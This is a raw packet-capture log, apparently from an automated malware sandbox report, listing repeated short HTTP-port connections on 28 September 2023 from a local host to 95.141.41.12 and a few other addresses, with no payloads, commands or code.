Sep 28, 2023 06:03:21.638906002 CEST	50069	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.639287949 CEST	50070	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.830107927 CEST	80	50069	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:21.830457926 CEST	50069	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.837016106 CEST	80	50070	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:21.837110043 CEST	50070	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.837340117 CEST	50070	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.035228014 CEST	80	50070	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:22.040539980 CEST	80	50070	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:22.040884018 CEST	50070	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.154845953 CEST	50070	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.155286074 CEST	50071	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.353311062 CEST	80	50070	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:22.353435040 CEST	50070	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.361212969 CEST	80	50071	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:22.361428976 CEST	50071	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.361522913 CEST	50071	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.567600965 CEST	80	50071	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:22.572141886 CEST	80	50071	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:22.572527885 CEST	50071	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.686192989 CEST	50071	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.686520100 CEST	50073	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.881257057 CEST	80	50073	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:22.881472111 CEST	50073	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.881691933 CEST	50073	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:22.891952038 CEST	80	50071	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:22.892204046 CEST	50071	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.077234030 CEST	80	50073	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:23.081327915 CEST	80	50073	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:23.081434011 CEST	50073	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.185928106 CEST	50073	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.186331987 CEST	50074	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.376873016 CEST	80	50074	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:23.377218008 CEST	50074	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.377274036 CEST	50074	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.380909920 CEST	80	50073	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:23.380975008 CEST	50073	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.568166018 CEST	80	50074	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:23.575583935 CEST	80	50074	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:23.575808048 CEST	50074	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.685741901 CEST	50074	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.686254025 CEST	50075	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.876373053 CEST	80	50074	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:23.876465082 CEST	50074	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.883128881 CEST	80	50075	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:23.883259058 CEST	50075	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:23.883486032 CEST	50075	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.080080986 CEST	80	50075	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:24.085227013 CEST	80	50075	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:24.085309982 CEST	50075	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.201239109 CEST	50075	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.201636076 CEST	50077	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.399425983 CEST	80	50075	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:24.399636030 CEST	50075	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.407205105 CEST	80	50077	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:24.407406092 CEST	50077	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.407545090 CEST	50077	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.612461090 CEST	80	50077	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:24.617629051 CEST	80	50077	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:24.617714882 CEST	50077	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.732413054 CEST	50077	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.732712030 CEST	50078	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.926898003 CEST	80	50078	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:24.927093983 CEST	50078	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.927267075 CEST	50078	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:24.938282013 CEST	80	50077	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:24.938493967 CEST	50077	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.121170044 CEST	80	50078	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:25.125997066 CEST	80	50078	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:25.126354933 CEST	50078	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.232297897 CEST	50078	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.232737064 CEST	50079	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.419971943 CEST	80	50079	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:25.420114994 CEST	50079	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.420280933 CEST	50079	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.426356077 CEST	80	50078	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:25.426414013 CEST	50078	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.607512951 CEST	80	50079	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:25.611790895 CEST	80	50079	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:25.612004042 CEST	50079	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.716903925 CEST	50079	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.717263937 CEST	50082	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.904155016 CEST	80	50079	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:25.904362917 CEST	50079	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.913860083 CEST	80	50082	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:25.913928986 CEST	50082	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:25.914129019 CEST	50082	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.111313105 CEST	80	50082	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:26.116904974 CEST	80	50082	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:26.117084980 CEST	50082	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.232363939 CEST	50082	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.232817888 CEST	50083	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.420084953 CEST	80	50083	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:26.420300961 CEST	50083	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.420386076 CEST	50083	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.429497957 CEST	80	50082	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:26.429611921 CEST	50082	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.607506037 CEST	80	50083	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:26.613692045 CEST	80	50083	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:26.614011049 CEST	50083	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.717003107 CEST	50083	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.717319012 CEST	50084	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.904582024 CEST	80	50083	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:26.904756069 CEST	50083	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.914915085 CEST	80	50084	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:26.915086031 CEST	50084	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:26.915219069 CEST	50084	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.112288952 CEST	80	50084	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:27.115575075 CEST	80	50084	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:27.115725994 CEST	50084	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.232707977 CEST	50084	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.235311031 CEST	50086	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.430258036 CEST	80	50084	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:27.430342913 CEST	50084	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.435070038 CEST	80	50086	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:27.435256958 CEST	50086	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.435348988 CEST	50086	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.635308027 CEST	80	50086	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:27.639991045 CEST	80	50086	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:27.640291929 CEST	50086	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.748445988 CEST	50086	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.748668909 CEST	50087	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.939090014 CEST	80	50087	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:27.939276934 CEST	50087	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.939490080 CEST	50087	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:27.948805094 CEST	80	50086	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:27.949044943 CEST	50086	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.129709959 CEST	80	50087	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:28.135675907 CEST	80	50087	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:28.135730028 CEST	50087	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.248322964 CEST	50087	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.248857021 CEST	50088	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.438505888 CEST	80	50087	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:28.438579082 CEST	50087	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.439198971 CEST	80	50088	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:28.439301014 CEST	50088	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.439496040 CEST	50088	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.630300999 CEST	80	50088	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:28.632895947 CEST	80	50088	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:28.633076906 CEST	50088	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.748151064 CEST	50088	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.748594999 CEST	50089	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.936433077 CEST	80	50089	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:28.936531067 CEST	50089	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.938097000 CEST	50089	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:28.939337969 CEST	80	50088	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:28.939526081 CEST	50088	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.125936031 CEST	80	50089	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:29.137470007 CEST	80	50089	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:29.137552023 CEST	50089	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.248588085 CEST	50089	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.248991966 CEST	50091	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.435863972 CEST	80	50089	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:29.435926914 CEST	50089	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.448187113 CEST	80	50091	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:29.448281050 CEST	50091	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.448503017 CEST	50091	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.648016930 CEST	80	50091	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:29.652467012 CEST	80	50091	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:29.652781963 CEST	50091	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.766347885 CEST	50092	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.766371965 CEST	50091	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.955490112 CEST	80	50092	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:29.955856085 CEST	50092	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.956140995 CEST	50092	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:29.966612101 CEST	80	50091	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:29.966686010 CEST	50091	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.144432068 CEST	80	50092	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:30.150490999 CEST	80	50092	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:30.150753975 CEST	50092	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.263767004 CEST	50092	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.264206886 CEST	50093	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.451423883 CEST	80	50093	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:30.451728106 CEST	50093	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.451880932 CEST	50093	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.452240944 CEST	80	50092	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:30.452430010 CEST	50092	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.639014959 CEST	80	50093	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:30.643241882 CEST	80	50093	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:30.643321991 CEST	50093	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.748081923 CEST	50093	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.748395920 CEST	50095	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.935520887 CEST	80	50093	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:30.935772896 CEST	50093	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.941360950 CEST	80	50095	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:30.941560984 CEST	50095	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:30.941760063 CEST	50095	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.134970903 CEST	80	50095	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:31.139523029 CEST	80	50095	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:31.139617920 CEST	50095	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.248055935 CEST	50095	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.248569965 CEST	50096	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.441394091 CEST	80	50095	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:31.441482067 CEST	50095	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.444380045 CEST	80	50096	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:31.444475889 CEST	50096	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.444788933 CEST	50096	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.640605927 CEST	80	50096	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:31.646167994 CEST	80	50096	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:31.646404028 CEST	50096	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.764039993 CEST	50096	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.764518023 CEST	50097	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.958004951 CEST	80	50097	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:31.958359003 CEST	50097	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.958471060 CEST	50097	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:31.959920883 CEST	80	50096	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:31.960074902 CEST	50096	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.152210951 CEST	80	50097	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:32.156584978 CEST	80	50097	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:32.156697989 CEST	50097	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.263910055 CEST	50097	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.264130116 CEST	50099	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.457922935 CEST	80	50097	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:32.458225012 CEST	50097	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.460468054 CEST	80	50099	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:32.460808039 CEST	50099	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.460808039 CEST	50099	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.658179998 CEST	80	50099	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:32.664899111 CEST	80	50099	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:32.665216923 CEST	50099	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.779674053 CEST	50099	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.780184984 CEST	50100	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.974138021 CEST	80	50100	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:32.974522114 CEST	50100	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.974523067 CEST	50100	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:32.976366997 CEST	80	50099	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:32.976443052 CEST	50099	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.168159008 CEST	80	50100	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:33.172797918 CEST	80	50100	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:33.173098087 CEST	50100	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.279028893 CEST	50100	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.279344082 CEST	50101	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.467196941 CEST	80	50101	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:33.467530966 CEST	50101	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.467679024 CEST	50101	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.472847939 CEST	80	50100	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:33.473120928 CEST	50100	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.654730082 CEST	80	50101	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:33.656708956 CEST	80	50101	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:33.656997919 CEST	50101	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.764017105 CEST	50101	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.764445066 CEST	50103	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.952420950 CEST	80	50101	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:33.952485085 CEST	80	50103	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:33.952647924 CEST	50101	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.952676058 CEST	50103	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:33.952809095 CEST	50103	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.140113115 CEST	80	50103	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:34.141413927 CEST	80	50103	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:34.141758919 CEST	50103	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.248204947 CEST	50103	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.248694897 CEST	50104	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.435415030 CEST	80	50103	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:34.435607910 CEST	50103	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.445708990 CEST	80	50104	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:34.445998907 CEST	50104	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.446310997 CEST	50104	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.643450975 CEST	80	50104	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:34.644306898 CEST	80	50104	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:34.644488096 CEST	50104	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.748780966 CEST	50104	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.749324083 CEST	50105	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.942981005 CEST	80	50105	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:34.943284035 CEST	50105	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.943406105 CEST	50105	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:34.945787907 CEST	80	50104	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:34.945936918 CEST	50104	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.136960030 CEST	80	50105	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:35.137984991 CEST	80	50105	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:35.138117075 CEST	50105	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.248341084 CEST	50105	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.248941898 CEST	50107	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.442549944 CEST	80	50105	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:35.442611933 CEST	80	50107	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:35.442758083 CEST	50105	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.442792892 CEST	50107	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.442873955 CEST	50107	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.636950970 CEST	80	50107	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:35.638204098 CEST	80	50107	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:35.638489008 CEST	50107	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.748045921 CEST	50107	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.748534918 CEST	50108	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.936327934 CEST	80	50108	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:35.936574936 CEST	50108	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.938960075 CEST	50108	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:35.941114902 CEST	80	50107	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:35.941205025 CEST	50107	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.126632929 CEST	80	50108	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:36.127796888 CEST	80	50108	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:36.127985954 CEST	50108	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.232479095 CEST	50108	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.232964039 CEST	50109	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.246783972 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:03:36.246819973 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:03:36.420296907 CEST	80	50108	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:36.420406103 CEST	50108	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.426858902 CEST	80	50109	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:36.426935911 CEST	50109	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.427124977 CEST	50109	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.621257067 CEST	80	50109	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:36.622399092 CEST	80	50109	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:36.622628927 CEST	50109	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.637106895 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:03:36.732335091 CEST	50109	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.732872963 CEST	50111	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.840218067 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:03:36.926667929 CEST	80	50109	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:36.926913023 CEST	50109	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.930057049 CEST	80	50111	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:36.930269957 CEST	50111	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:36.930327892 CEST	50111	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.127660990 CEST	80	50111	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:37.136039972 CEST	80	50111	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:37.136250019 CEST	50111	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.248106003 CEST	50111	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.248466969 CEST	50112	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.340074062 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:03:37.445725918 CEST	80	50111	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:37.445971012 CEST	50111	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.453222990 CEST	80	50112	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:37.453530073 CEST	50112	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.453610897 CEST	50112	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.658591032 CEST	80	50112	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:37.663849115 CEST	80	50112	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:37.663944006 CEST	50112	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.779920101 CEST	50112	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.780308962 CEST	50113	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.840315104 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:03:37.976330996 CEST	80	50113	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:37.976411104 CEST	50113	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.976579905 CEST	50113	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:37.984751940 CEST	80	50112	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:37.984930992 CEST	50112	80	192.168.2.3	95.141.41.12
